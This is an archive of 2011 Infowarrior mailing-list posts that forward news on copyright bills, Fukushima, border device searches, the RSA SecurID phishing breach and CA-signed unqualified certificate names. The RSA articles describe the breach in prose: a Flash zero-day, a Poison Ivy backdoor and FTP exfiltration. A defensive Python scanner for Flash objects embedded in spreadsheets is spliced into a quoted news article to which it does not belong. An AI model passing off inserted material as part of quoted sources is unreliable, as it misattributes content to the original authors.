These laws won't just have the power to stop copyright infringers. They have the potential to stop legitimate uses that the content industries don't like -- examples like YouTube and even the early MP3 players are examples of legitimate uses that big content have gone after. As Senator Wyden put it: "the collateral damage of this statute could be American innovation, American jobs, and a secure Internet."

The result of laws like this? Startups -- the engine of America's growth -- will just go elsewhere. China and India are creating environments extremely conducive to disruptive innovation. Even Europe is benefiting -- one of the most promising recent music services, Spotify, is hosted in Europe.
It's still not available to American consumers.

Unfortunately, a subset of what COICA proposes is already in existence today. Immigration and Customs Enforcement (known as ICE) has been simply seizing domains of websites suspected of copyright infringement at taxpayer expense. Because of the sheer number of sites the content industries want taken down, they innovated -- by bypassing due process altogether. ICE have taken down entire sites for only linking to files -- for example, torrent-finder.com. The sites have no opportunity to stop this process until after they have been taken down. If you're the next YouTube, would you want to locate here in the US and risk having the government simply switch off your site at the behest of Big Content? Or might it not be easier to find a more benign environment to create your business in?

The ultimate irony in all of this is that if we stop giving the content industries what they want -- sweeping, blanket protections -- we may actually be doing them a favor. They wanted the VCR banned. It turned out to be one of the most profitable technologies for the movie industry in its history. Ignoring their requests may turn out to be cruel to be kind -- instead of focusing on trying to fight the technology, they'll be forced to find ways of profitably embracing it.

The next generation of technology companies are already starting to shift overseas. Before conceding to any more demands for protection from Big Content, America would do well to consider what it places at risk.

James Allworth is a Fellow at the Forum for Growth and Innovation at Harvard Business School.
From rforno at infowarrior.org Mon Apr 4 20:47:44 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 4 Apr 2011 21:47:44 -0400
Subject: [Infowarrior] - Lawmakers renew push for "rogue websites" bill
Message-ID:

Lawmakers renew push for "rogue websites" bill
Mon Apr 4, 5:59 pm ET
http://news.yahoo.com/s/nm/20110404/wr_nm/us_usa_trade_websites/print

WASHINGTON (Reuters) - A bipartisan group of lawmakers from both chambers of Congress on Monday vowed to pass legislation giving the U.S. Justice Department new authority to go after foreign and domestic websites that sell pirated music and movies and counterfeit goods.

"Online infringement and the sale of counterfeit goods cost American creators, producers, and businesses billions of dollars and results in the loss of hundreds of thousands of jobs," Senate Judiciary Committee Chairman Patrick Leahy, a Democrat, told reporters.

Intellectual property theft is "one of the greatest threats to our economy today" because of the big role that copyrights, patents and trademarks play in boosting U.S. exports and productivity, said House of Representatives Judiciary Committee Chairman Lamar Smith, a Republican.

"If we're going to have a healthy economy, we need to have a healthy IP sector," Smith said.

Leahy said he would push forward with a new version of a "rogue websites" bill that cleared his committee last year by a vote of 19-0 but did not get a vote in the full Senate. The House Judiciary Committee will hold a second hearing this week on the issue, with the goal of crafting its own legislation, Smith said.

"I think with the leadership of both chairmen we're going to get a bill to the president's desk," Leahy said.

Many websites selling pirated and fake goods operate out of China, although lawmakers said their efforts were not aimed at any particular country. U.S. labor and business groups backed the renewed push.
"Too few people who download entertainment illegally recognize that they are stealing wages and benefits from workers," said Paul Almeida, president of the AFL-CIO labor federation's department for professional employees.

The Chamber of Commerce's Global Intellectual Property Center estimates piracy and counterfeiting have stolen 2-1/2 million jobs over the years, largely due to websites which a recent report said receive over 53 billion visits a year.

(Reporting by Doug Palmer; editing by Eric Beech)

From rforno at infowarrior.org Tue Apr 5 06:42:46 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 5 Apr 2011 07:42:46 -0400
Subject: [Infowarrior] - Radioactivity in sea up 7.5 million times
Message-ID:

Tuesday, April 5, 2011
Radioactivity in sea up 7.5 million times
Marine life contamination well beyond Japan feared
By KANAKO TAKAHARA
Staff writer
http://search.japantimes.co.jp/cgi-bin/nn20110405x1.html

Radioactive iodine-131 readings taken from seawater near the water intake of the Fukushima No. 1 nuclear plant's No. 2 reactor reached 7.5 million times the legal limit, Tokyo Electric Power Co. admitted Tuesday.

The sample that yielded the high reading was taken Saturday, before Tepco announced Monday it would start releasing radioactive water into the sea, and experts fear the contamination may spread well beyond Japan's shores to affect seafood overseas.

The unstoppable radioactive discharge into the Pacific has prompted experts to sound the alarm, as cesium, which has a much longer half-life than iodine, is expected to concentrate in the upper food chain.

According to Tepco, some 300,000 becquerels per sq. centimeter of radioactive iodine-131 was detected Saturday, while the amount of cesium-134 was 2 million times the maximum amount permitted and cesium-137 was 1.3 million times the amount allowable. The amount of iodine-131 dropped to 79,000 becquerels per sq.
centimeter Sunday but shot up again Monday to 200,000 becquerels, 5 million times the permissible amount. The level of radioactive iodine in the polluted water inside reactor 2's cracked storage pit had an even higher concentration. A water sample Saturday had 5.2 million becquerels of iodine per sq. centimeter, or 130 million times the maximum amount allowable, and water leaking from the crack had a reading of 5.4 million becquerels, Tepco said. "It is a considerably high amount," said Hidehiko Nishiyama, spokesman for the Nuclear and Industrial Safety Agency. Masayoshi Yamamoto, a professor of radiology at Kanazawa University, said the high level of cesium is the more worrisome find. "By the time radioactive iodine is taken in by plankton, which is eaten by smaller fish and then by bigger fish, it will be diluted by the sea and the amount will decrease because of its eight-day half-life," Yamamoto said. "But cesium is a bigger problem." The half-life of cesium-137 is 30 years, while that for cesium-134 is two years. The longer half-life means it will probably concentrate in the upper food chain. Yamamoto said such radioactive materials are likely to be detected in fish and other marine products in Japan and other nations in the short and long run, posing a serious threat to the seafood industry in other nations as well. "All of Japan's sea products will probably be labeled unsafe and other nations will blame Japan if radiation is detected in their marine products," Yamamoto said. Tepco on Monday began the release into the sea of 11,500 tons of low-level radioactive water to make room to store high-level radiation-polluted water in the No. 2 turbine building. The discharge continued Tuesday. "It is important to transfer the water in the No. 2 turbine building and store it in a place where there is no leak," Nishiyama of the NISA said. "We want to keep the contamination of the sea to a minimum." 
Chief Cabinet Secretary Yukio Edano apologized for the release of radioactive water into the sea but said it was unavoidable to prevent the spread of higher-level radiation.

Fisheries minister Michihiko Kano said the ministry plans to increase its inspections of fish and other marine products for radiation. On Monday, 4,080 becquerels per kilogram of radioactive iodine was detected in lance fish caught off Ibaraki Prefecture. Fishermen voluntarily suspended its shipment. The health ministry plans to compile radiation criteria for banning marine products.

Three days after Tepco discovered the crack in the reactor 2 storage pit it still hadn't found the source of the high radiation leak seeping into the Pacific. Tepco initially believed the leak was somewhere in the cable trench that connects the No. 2 turbine building and the pit. But after using milky white bath salt to trace the flow, which appeared to prove that was not the case, the utility began to think it may be seeping through a layer of small stones below the cable trench.

Information from Kyodo added

From rforno at infowarrior.org Tue Apr 5 14:13:05 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 5 Apr 2011 15:13:05 -0400
Subject: [Infowarrior] - Once Again, Court Says Homeland Security Is Free To Seize & Search Your Computer Without A Warrant At The Border
Message-ID: <1B5C784A-EE99-43B3-B4F4-AF2DFB9DE9EC@infowarrior.org>

Once Again, Court Says Homeland Security Is Free To Seize & Search Your Computer Without A Warrant At The Border
http://www.techdirt.com/articles/20110404/16142013775/once-again-court-says-homeland-security-is-free-to-seize-search-your-computer-without-warrant-border.shtml
from the bad-rulings dept

We've noted, repeatedly, how troubling it is that customs seems to feel no duty to obey the 4th Amendment at the border, and that the courts have allowed this. It's even worse when it comes to searching digital devices, such as laptops.
As we've explained before, what you have access to via your laptop is entirely different than what you pack in a suitcase for entering the country:

- You mostly store everything on your laptop. So, unlike a suitcase that you're bringing with you, it's the opposite. You might specifically choose what to exclude, but you don't really choose what to include. With a suitcase, you specifically choose what to include.

- The reason you bring the contents on your laptop over the border is because you're bringing your laptop over the border. If you wanted the content of your laptop to go over the border you'd just send it using the internet. There are no "border guards" on the internet itself, so content flows mostly freely across international boundaries. Thus if anyone wants to get certain content into a country via the internet, they're not doing it by entering that country through border control.

And this becomes even more ridiculous in the era of cloud computing, where a drive may be mounted over the network, and thus never actually cross the border at all -- and yet, Homeland Security seems to think it has the right to search all of this, and the courts have mostly agreed.

And, once again, we have yet another appeals court ruling that says this is fine even if the laptop is taken away from the customs station and brought into the country. We've had similar rulings in the past, and this one involves laptops that were taken away from the border and brought to another location, 170 miles away, where they were searched. The lower court said this evidence could not be used, but the appeals court reinstated the evidence, claiming that tossing out such evidence "would only reward those individuals who, either because of the nature of their contraband or the sophistication of their criminal enterprise, hide their contraband more cleverly or would be inclined to seek entry at more vulnerable points less equipped to discover them." But that makes no sense.
I mean, if you're good at hiding your "contraband" that's already true. Nothing about this ruling changes that. All this ruling does is say that it's okay for border officials from Homeland Security to search through your stuff without reasonable suspicion. It's not about rewarding people who better hide things, it's about the basic requirement of the 4th Amendment that there be probable cause before the government can take your stuff and search it. Only the dissenting judge seemed to recognize this basic issue in the ruling, which is embedded below, noting: "I add my voice to the chorus lamenting the apparent demise of the Fourth Amendment."

The majority ruling claims that it's not setting up an "anything goes" situation at the border, but it's difficult to see how it's placed any limits at all on Homeland Security. It claims that it's fine to search laptops at the border, because Homeland Security and ICE have a compelling reason to keep material out of the US that it doesn't want crossing the border. But, when it comes to digital content, that's just silly. No one is crossing the border with a laptop to "get content into the country." They can do that using the internet just fine. Claiming that searching the contents of a laptop is like searching a suitcase is technically illiterate.

Of course, since this is a child porn/child abuse claim, it's easy to say that it's a "good thing" that the search caught this guy -- which it did. And I'm happy he was eventually arrested. But I'm still troubled with how the evidence was collected, and anyone who crosses the border with their computers should be equally concerned. Don't let the fact that this case was about child pornography detract from the important issues about your own privacy rights concerning information stored on a laptop.
From rforno at infowarrior.org Tue Apr 5 15:10:03 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 5 Apr 2011 16:10:03 -0400
Subject: [Infowarrior] - RSA Blames Phishing Attack for March Security Breach
Message-ID: <4DD20614-EEEA-4745-AC20-BBCD1AA374BE@infowarrior.org>

(c/o KM)

RSA Blames Phishing Attack for March Security Breach
ARTICLE DATE: 04.05.11
By Chloe Albanesius
http://www.pcmag.com/print_article2/0,1217,a=262703,00.asp?hidPrint=true

RSA, the security division of EMC, blamed a phishing attack for a recent breach that threatened its SecurID authentication service.

Specifically, a hacker sent two different phishing emails over a two-day period to a small group of RSA employees. The subject line of the emails was "2011 Recruitment Plan" and it included an Excel spreadsheet with the same name.

"The email was crafted well enough to trick one of the employees to retrieve it from their Junk mail folder, and open the attached excel file," Uri Rivner, head of new technologies, identity protection and verification at RSA, wrote in a Friday blog post.

That spreadsheet, however, contained a zero-day exploit that installed a backdoor through an Adobe Flash vulnerability, Rivner said. Adobe has since released a patch for the bug.

Last month, RSA sent a letter to customers that warned them of "an extremely sophisticated cyber attack in progress being mounted against RSA." Executive chairman Art Coviello said at the time that the attack was an Advanced Persistent Threat (APT) that resulted in the hackers extracting "certain information" from RSA's systems.

Coviello said the attack did not allow for a direct attack on RSA's SecurID system, but it might be used to "reduce the effectiveness of a current two-factor authentication implementation as part of a broader attack," he said.
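A defender-side triage check for the delivery vector described above (an Excel attachment carrying a Flash object), written as an added example here and not code from RSA or the article: an .xlsx is a ZIP container, so the scanner walks its parts and flags any binary part that carries a SWF signature, using a constructed sample workbook rather than a real file. The SWF header layout (3-byte signature, version byte, 4-byte little-endian length) is assumed from the public file format; the part names used in the sample are hypothetical.

```python
"""Flag Flash (SWF) objects embedded in an OOXML spreadsheet.

Added example for mail-gateway or incident triage; not RSA's code.
Assumption: wherever an SWF is wrapped inside the workbook (OLE object,
media or ActiveX part), the SWF bytes themselves still start with "FWS"
(uncompressed), "CWS" (zlib) or "ZWS" (LZMA), then a version byte, then a
4-byte little-endian length.
"""
import io
import zipfile

SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")
MAX_SWF_VERSION = 40   # no Flash Player version came near this; filters text coincidences


def _swf_headers(blob):
    """Yield (offset, kind, version, declared_length) for plausible SWF headers in blob."""
    for magic in SWF_MAGICS:
        off = blob.find(magic)
        while off != -1:
            hdr = blob[off:off + 8]
            if len(hdr) == 8:
                version = hdr[3]
                length = int.from_bytes(hdr[4:8], "little")
                plausible = 1 <= version <= MAX_SWF_VERSION and length >= 8
                # An FWS length is the on-disk size, so it cannot exceed what remains;
                # CWS/ZWS declare the *uncompressed* size, so only the version is checked.
                if magic == b"FWS":
                    plausible = plausible and length <= len(blob) - off
                if plausible:
                    yield off, magic.decode("ascii"), version, length
            off = blob.find(magic, off + 1)


def find_embedded_flash(xlsx_bytes):
    """Return a list of findings (one dict per SWF header) for an .xlsx given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # XML and relationship parts are text; a signature there is a string
            # coincidence, not an object, so they are skipped to avoid false positives.
            if info.filename.lower().endswith((".xml", ".rels")):
                continue
            blob = zf.read(info.filename)
            for off, kind, version, length in _swf_headers(blob):
                findings.append({
                    "part": info.filename,
                    "offset": off,
                    "kind": kind,
                    "version": version,
                    "declared_length": length,
                })
    return findings


def build_sample_workbook(with_flash):
    """Constructed sample: a minimal xlsx-shaped ZIP, optionally with a fake embedded SWF.

    The part names and contents are hypothetical; the benign sheet deliberately
    contains the strings "CWS" and "FWS" as text to show they are not flagged.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook><sheets/></workbook>")
        zf.writestr("xl/worksheets/sheet1.xml", "<worksheet>CWS plan FWS</worksheet>")
        if with_flash:
            # 32 bytes of fake OLE wrapper, then a CWS header: version 10, 64 KiB uncompressed.
            payload = (b"\xd0\xcf\x11\xe0" + b"\x00" * 28
                       + b"CWS" + bytes([10]) + (65536).to_bytes(4, "little")
                       + b"\x00" * 16)
            zf.writestr("xl/embeddings/oleObject1.bin", payload)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        hits = find_embedded_flash(build_sample_workbook(flag))
        print("with_flash=%s -> %s" % (flag, hits or "clean"))
```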
In his blog post, Rivner said "in our case the weapon of choice was a Poison Ivy variant set in a reverse-connect mode that makes it more difficult to detect, as the PC reaches out to the command and control rather than the other way around. Similar techniques were reported in many past APTs, including GhostNet."

Rivner said the focus of an APT is to "use a totally new approach for entering the organization."

"You don't bother to just simply hack the organization and its infrastructure; you focus much more of your attention on hacking the employees," he wrote.

Rivner then touted the company's detection technology, arguing that "a lot of companies either detected the attacks after months, or didn't detect them at all and learned about it from the government."

Copyright (c) 2011 Ziff Davis Inc. All Rights Reserved.

From rforno at infowarrior.org Tue Apr 5 20:09:31 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Tue, 5 Apr 2011 21:09:31 -0400
Subject: [Infowarrior] - Patent dispute threatens US Alzheimer's research
Message-ID: <557B601B-C965-4699-9D3E-924940987088@infowarrior.org>

(c/o RSK)

Published online 5 April 2011 | Nature | doi:10.1038/472020a
http://www.nature.com/news/2011/110405/full/472020a.html

Patent dispute threatens US Alzheimer's research
Lawsuit could expose hundreds of scientists to property-rights litigation.
Erika Check Hayden

The website of the Alzheimer's Institute of America (AIA) doesn't reveal much about the organization, but portrays it as committed to supporting research and patients. Among people who study Alzheimer's disease, however, the AIA, based in St Louis, Missouri, is best known for filing lawsuits against companies and researchers -- a practice that scientists say could hamper the progress of research into combating the dreaded disease. An AIA lawsuit filed in February 2010 against the Jackson Laboratory in Bar Harbor, Maine -- a source of laboratory mice funded by the US National Institutes of Health (NIH) --
now threatens hundreds of government-sponsored Alzheimer's researchers with litigation. The lab is so concerned about the financial and scientific costs of defending itself that it has asked the NIH to assume the defence of the case. "The lawsuits raised by the AIA are unfortunate, and constitute a large drain on valuable scientific resources at a time when scientific funds are increasingly tight," says Benjamin Wolozin, an Alzheimer's researcher at Boston University in Massachusetts. The suit concerns an AIA patent on a human DNA sequence used in mouse models of Alzheimer's disease. The sequence encodes the 'Swedish mutation' (discovered in a Swedish family), which causes early-onset Alzheimer's. Michael Mullan, a biomedical researcher who is now head of the Roskamp Institute in Sarasota, Florida, patented the sequence in 1995, then sold it to the AIA. The NIH requires scientists to share transgenic mouse strains developed using NIH money, and the agency funds Jackson to breed, house and distribute these mouse models, says David Einhorn, house counsel at the lab. The AIA is alleging that Jackson infringed on its Swedish mutation patent, and others, when the lab distributed 22 strains of mice with the mutation to researchers; the organization is seeking unspecified damages. The lawsuit also accuses six commercial companies of improperly profiting from the Swedish mutation, for instance by using mice bearing the mutation to test potential drugs. Furthermore, the AIA has filed four separate suits relating to the patent against academic institutions and companies in Oklahoma, Florida, Missouri and Pennsylvania (see 'Patent disputes'). But the litigation against Jackson could have the broadest impact on research. According to Einhorn, the AIA is demanding that Jackson hands over the names of all scientists who have worked with the relevant mouse models; this raises the possibility that those individual researchers might also be sued. 
Last month, judge Elizabeth Laporte for the US District Court of Northern California recognized the potential impact of the suit on Alzheimer's research. She denied an AIA request to expand the suit by adding another patent-infringement claim, writing in her decision that the AIA has not disputed Jackson's claim that "prolonging the litigation in this case would harm Jackson and the public by extending the chilling effect of the litigation on mice research on Alzheimer's disease".

The AIA says that it allows academic research on mouse models covered by its patents, but does not permit work that profits from them. "Jackson Laboratory is not giving away the mice for academic research. On the contrary, these mice are being sold, and Jackson Laboratory is making quite a lot of money in the process. Furthermore, the mice Jackson sells are, in many instances, being used for commercial, not academic, purposes," the institute wrote in a statement.

Einhorn counters that the lab doesn't make enough from distributing mouse models to cover its operating costs, and it relies on philanthropy and public and private grants to support its work. He says that Jackson only allows academics, not companies, to use the models, and points out that asserting rights in such cases runs counter to common practice, which is established by NIH policy.

Defending against the lawsuit puts Jackson in a difficult spot. Proving that the AIA's allegations are groundless could take years and millions of dollars. It could also cast a pall over the Alzheimer's-research field, which has already been scarred by an extensive fight over the Swedish mutation patents during the 1990s (see Nature 404, 319-320; 2000). But settling out of court would require Jackson to hand over researchers' names, a demand that Einhorn calls "repugnant".
"We haven't been able to settle this case because we're trying to do the right thing by trying to support the NIH policy and protect researchers out there in the community," says Einhorn.

Kathy Hudson, NIH deputy director for science, outreach and policy, says that the agency is considering the lab's request for help, made last December. "We're trying to evaluate the legal risks and the risks to the research community," she says.

From rforno at infowarrior.org Wed Apr 6 08:07:26 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 6 Apr 2011 09:07:26 -0400
Subject: [Infowarrior] - OT: How the Senate was bait and switched into war
Message-ID: <5324C1DA-5C24-4FE5-842C-D63331835BA0@infowarrior.org>

(For years I've hated the idea of including "....and for other purposes" in the titles of legislation, as it gives Congresscritters awesome wiggle room (which they like) -- but more sinister is a practice described here, where a combination of individual assumptions and late-night legislative routines serve to quickly rush through legislation w/far-reaching ramifications. --- rick)

BELTWAY CONFIDENTIAL
How the Senate was bait and switched into war
By: Conn Carroll
04/04/11 3:26 PM
Associate Editor Of Commentary
http://washingtonexaminer.com/blogs/beltway-confidential/2011/04/how-senate-was-bait-and-switched-war

Last week, minutes after President Barack Obama explained to the nation why he took the country to war, Sen. Rand Paul (R-Ky.) posted a statement on YouTube first noting Obama's 2007 claim that "The President does not have power under the Constitution to unilaterally authorize a military attack in a situation that does not involve stopping an actual or imminent threat to the nation" and then adding: "Unfortunately, President Obama has failed to heed his own advice. He has ignored our constitution and engaged us in a military conflict without congressional debate and approval."
But the day before on This Week, Secretary of State Hillary Clinton told ABC News' Jake Tapper: "The United States Senate called for a no-fly zone in the resolution that it passed on March 1st."

So who is right? Did the president go to war without any approval from the Senate, as Sen. Paul says? Or did the Senate approve the president's use of military force, as Secretary Clinton claims?

The answer involves a secretive Senate procedure known as "hotlining." Hotlining is a system that allows legislation to pass by "unanimous consent," usually in the evening, when almost no Senators are present. Prior to a bill's consideration, the Democrat and Republican Cloakrooms send out hotline notices -- automated phone calls and emails -- to key staff. The hotline notices typically include the bill number, so members can look it up and review its contents.

However, in the case of Libya, the resolution was not made public until the day after the Senate approved it. According to numerous congressional aides, almost no members knew about the no-fly zone language. Most offices thought they were approving a different resolution -- with the same sponsor and a nearly identical title -- that had been circulating among congressional offices for two weeks.

In a February 22 email obtained by the Examiner, an aide to Sen. Robert Menendez (D-N.J.) sent a resolution to the staff of members of the Senate Foreign Relations Committee condemning human rights abuses in Libya. There was no mention of a no-fly zone.

On March 1st, at 4:03pm, a different resolution was "hotlined." The only information provided in the hotline email was the title: "S. Res. __ A resolution strongly condemning the gross and systematic violations of human rights in Libya, including violent attacks on protesters demanding democratic reforms, and for other purposes."
But what Senate offices did not know was that the sponsors had secretly slipped into the resolution the following sentence: "[the Senate] urges the United Nations Security Council to take such further action as may be necessary to protect civilians in Libya from attack, including the possible imposition of a no-fly zone over Libyan territory"

Most staff assumed the "hotline" referred to the previous draft, and had no reason to place a "hold" on a resolution condemning Libya Human Rights abuses. At 6:30 pm, Sen. Chuck Schumer (D-NY) took to a near empty chamber, and introduced the brand new resolution and asked that it be approved without debate or vote. By 6:31, the resolution was passed.

The resolution is non-binding and has no force of law, but that did not stop pro-war Senators from rushing out to claim that the Senate had just approved military action: "There is a bipartisan consensus building to provide assistance to liberated areas of Libya and to work with our allies to enforce a no-fly zone," a Sen. Mark Kirk (R-Ill.) statement released that night read.

Senators more skeptical of military action where the United States has no national interest felt deceived. Sen. Mike Lee (R-Utah) tells The Examiner: "Clearly, the process was abused. You don't use a hotline to bait and switch the country into a military conflict. There is no more difficult decision than whether to put our men and women in uniform in harm's way. With no imminent threat to the national security of the United States, the President should have asked for authorization and Congress should have had a thorough debate."

Sen. Paul is not giving up without a fight. Last Wednesday he introduced an amendment to a small business bill that would adopt then-candidate Obama's 2007 statement above as "the sense of the Senate." Majority Leader Harry Reid (D-Nev.) shut down the entire Senate to avoid debating the issue. But Sen. Paul's motion is still the pending business of the Senate.
With Senate action needed to avoid a government shutdown next week, Paul, and the American people, may just yet get a debate on military action in Libya.

From rforno at infowarrior.org Wed Apr 6 08:15:25 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 6 Apr 2011 09:15:25 -0400
Subject: [Infowarrior] - RSA requiring customer NDA to detail SecurID hack
Message-ID: <60F57241-10F2-450A-B04F-99D22B44E4A1@infowarrior.org>

(To which, I call "shenanigans"--- and commend Gula et.al for speaking out against this demand. This sort of industry idiocy is, in my view, unconscionable for a variety of reasons, and once again ignites the issue of what should constitute proper cybersecurity disclosure practices not for any one party, but for the Internet community as a whole. For shame, RSA. In other news, how long before this 'proprietary' information becomes public? --- rick)

RSA detailing SecurID hack to customers sworn to secrecy
Some customers hesitant to sign nondisclosure agreements
By Ellen Messmer, Network World
April 05, 2011 05:45 PM ET
http://www.networkworld.com/cgi-bin/mailto/x.cgi?pagetosend=/news/2011/040511-rsa-hack-nda.html

RSA has started providing more detail into the mid-March attack on its SecurID token-based authentication system, but to get a fuller story you have to be an RSA customer willing to sign a nondisclosure agreement (NDA). An NDA means that you agree to keep secret what RSA would be willing to tell you. Sources say RSA is reaching out to its largest customers, especially those in sensitive industries, to get IT executives to sign such NDAs. However, some RSA customers say they aren't willing to do that.

"RSA was asking that I sign an NDA," says Ron Gula, CEO at Tenable Network Security, which uses SecurID tokens for authentication. "I'm suspicious. Why hide it?"
Gula said he doesn't want to feel his hands are tied by agreeing to an NDA, though he hopes in the end it's "all a non-issue" about something that RSA will speak about soon anyway. But it's making him uneasy and he's looking at using other authentication products.

Jon Oltsik, senior principal analyst at Enterprise Strategy Group, says he did sign an NDA. "Let me put it this way, I learned a little more," he says, adding that as an analyst, he doesn't know whether he heard the same discussion RSA is sharing with its customers. He notes RSA is starting to discuss the topic of the break-in more. "We're in uncharted waters. They're trying to be cautious."

"I didn't want to sign an NDA. I think I need to be independent," says Bill Nelson, president of the Financial Services - Information Sharing and Analysis Center (FS-ISAC), the industry forum for collaboration against critical security threats, which interacts with government agencies such as Department of Homeland Security. IT-ISAC uses SecurID, and there's nothing known publicly related to the RSA data breach and SecurID so far to alter the decision to use it, Nelson says.

RSA itself says it has "executed a massive outreach program" that has reached more than 60,000 customers with its security notes about the painful topic, and there have been discussions with more than 15,000 customers by phone, more than 5,000 customers via conference calls and "hundreds of face-to-face meetings." RSA declines to say how many customers have been offered or declined an NDA briefing.

Nelson said he decided to decline to sign an NDA to get yet more information that would be secret. He notes many IT-ISAC members, however, some of whom were angry at first, have signed an NDA, and are now sworn to secrecy. Nelson says he doesn't know what's in the NDA briefing from RSA. But much of the discussion from RSA in the wake of the March breach disclosure has been about best-practices deployments of the RSA SecurID token system.
Tales have been told over the years about poor implementation of SecurID, where lax security practices were followed, Nelson notes. "They're addressing poor implementations of their products," he says.

Sources close to RSA say not all RSA SecurID customers are being approached to sign an NDA, which means they would not be offered privileged information. Under the NDA, RSA is sharing far more detail regarding a "worst-case scenario" about how the RSA SecurID token system can be undermined by an attack, and offering more clarity about remediation. There's cause to believe RSA is itself remediating SecurID, with a source close to RSA saying the security issues brought to the fore should not impact future RSA SecurID customers.

RSA is starting to speak a bit more about what happened during the break-in. For one thing, RSA employees were tricked by a targeted phishing attack using a spreadsheet containing an Adobe Flash zero-day vulnerability (CVE-2011-0609), said Uri Rivner, head of new technology for identity protection and verification, in a recent RSA blog post. The subject-line lure, he says, was "2011 recruitment plan.xls," which was apparently so enticing, one RSA employee even retrieved it from a spam filter, where it had been caught. Clicking on it allowed the attacker to take over the machine. "They performed privilege escalation on non-administrative users in the targeted systems, and then moved on to gain access to key high-value targets, which included process experts and IT and non-IT specific server administrators," Rivner writes.
The attacker set up staging servers as "key aggregation points" and "then they went into servers of interest, removed data and moved it to internal staging servers where the data was aggregated, compressed and encrypted for extraction," according to Rivner's RSA blog. "The attacker then used FTP to transfer many password-protected RAR files from the RSA file server to an outside staging area at an external, compromised machine at a hosting provider." The attacker stole away with the files from there.

The Adobe zero-day vulnerability, now patched by Adobe, allowed the attacker to control the victim's machine at RSA and use a variant of a long-known hacker tool called Poison Ivy to set up a command-and-control system aimed at extricating data.

Sam Curry, chief technology officer, marketing, at RSA, says the NetWitness NextGen security-monitoring product, which RSA has used for three years, was instrumental in detecting the attack in progress. "It helped us to identify it," he says. Coincidentally, RSA has been in discussions to acquire the company NetWitness, which it did on April 1 and announced just this week.

From rforno at infowarrior.org Wed Apr 6 12:44:16 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 6 Apr 2011 13:44:16 -0400
Subject: [Infowarrior] - Unqualified Names in the SSL Observatory
Message-ID: <2C4F8D2A-43F8-415E-B68C-6572D3AEB8FF@infowarrior.org>

(a colleague and I wrote about this problem nearly 10 years ago ... funny how what's old becomes new again .... or what's bad becomes horrific...... --- rick)

April 5th, 2011
Unqualified Names in the SSL Observatory
Technical Analysis by Chris Palmer
https://www.eff.org/deeplinks/2011/04/unqualified-names-ssl-observatory

Internet certification authorities (CAs) are charged with the task of vouching for the identities of secure web servers. When you browse to https://www.wellsfargo.com/, your browser knows it's the real wellsfargo.com because VeriSign, a CA, says it is.
However, if CAs don't validate the identities of the sites they vouch for, the whole system breaks down. In this post, I'll discuss one way in which CAs frequently fail.

Using data in EFF's SSL Observatory, we have been able to quantify the extent to which CAs engage in the insecure practice of signing certificates for unqualified names. That they do so in large numbers indicates that they do not even minimally validate the certificates they sign. This significantly undermines CAs' claim to be trustworthy authorities for internet names. It also puts internet users at increased risk of network attack.

Normally, a public CA like Verisign or Comodo should sign only public names. On the internet, only fully-qualified domain names are public and routable. For example, "www.eff.org." is a fully-qualified name. By contrast, the name "www" is unqualified or not fully-qualified. This name is not globally unique, and may refer to a different computer on my network than it does on your network. (On some networks, it may not refer to any computer at all.)

As a convenience for users, the administrators of local networks will often configure their networks to use unqualified names for internal services. This is why, at many companies, you can simply type "mail" or "wiki" or "intranet" into your browser, and get to your company's internal web resources. But these names have, or should have, no meaning on the global internet.

In the Observatory we have discovered many examples of CA-signed certificates for unqualified domain names. In fact, the most common unqualified name is "localhost", which always refers to your own computer! It simply makes no sense for a public CA to sign a certificate for this private name. Some CAs have signed many, many certificates for this name, which indicates that they do not even keep track of which names they have signed. Some other CAs do make sure to sign "localhost" only once. Cold comfort!

Although signing "localhost" is humorous, CAs create real risk when they sign other unqualified names. What if an attacker were able to receive a CA-signed certificate for names like "mail" or "webmail"? Such an attacker would be able to perfectly forge the identity of your organization's webmail server in a "man-in-the-middle" attack! Everything would look normal: your browser would use HTTPS, it would show the lock icon that indicates HTTPS is working properly, it would show that a real CA validated the HTTPS certificate, and it would raise no security warnings. And yet, you would be giving your password and your email contents to the attacker.

To test the prevalence of the validated, unqualified names problem, I queried the Observatory database for unqualified names similar to "exchange". (Microsoft Exchange is an extremely popular email server, and servers that run it commonly have "exchange" or "exch" in their names. Likely examples include "exchange.example.net" and "exch-01.example.com".) My results show that unqualified "exchange"-like names are the most popular type of name, overall, that CAs are happy to sign.

    Unqualified name pattern                                                        Valid certificates observed
    "localhost"                                                                       2,201
    "exchange"                                                                          806
    "exchange" with characters on either side, e.g. "exchange01" or "aexchange3"      2,383
    "exch" with characters on either side, e.g. "exch01" or "01srvexch"               5,657
    All unqualified names                                                            37,244

Related Work

George Macon at Georgia Tech has also used the Observatory to investigate the unqualified names problem. For example, he isolated the CAs that sign unqualified names, and counted how many times each one did so. (GoDaddy is by far the worst offender.) He also identified some extended-validation certificates that are issued to unqualified names. In January 2011, when he ran his analysis, ten of the twenty-eight unqualified EV certificates were still valid.

Impact

It is far too easy for an attacker to perform a very convincing MITM attack against private exchange servers.
The bad behavior of CAs helps attackers.

Recommendations

Users should avoid using unqualified names to access internal resources. Instead, create a bookmark to the URL with the fully-qualified name, e.g. "https://mail.example.com/". Users should also alert their network administrators to the problem.

Browsers (and other TLS clients, like email readers and web service applications) should stop treating certificates for unqualified names and for IP addresses as valid.

Organizations relying on certificates for unqualified names should use their own private CA for their private namespace. For example, all those Exchange shops can use Microsoft's CA software.

Certificate authorities should stop signing unqualified names, and should revoke existing certificates for unqualified names. They should also stop signing IP addresses, especially private, non-routable addresses, and should revoke existing IP address certificates, too.

From rforno at infowarrior.org Wed Apr 6 17:29:59 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 6 Apr 2011 18:29:59 -0400
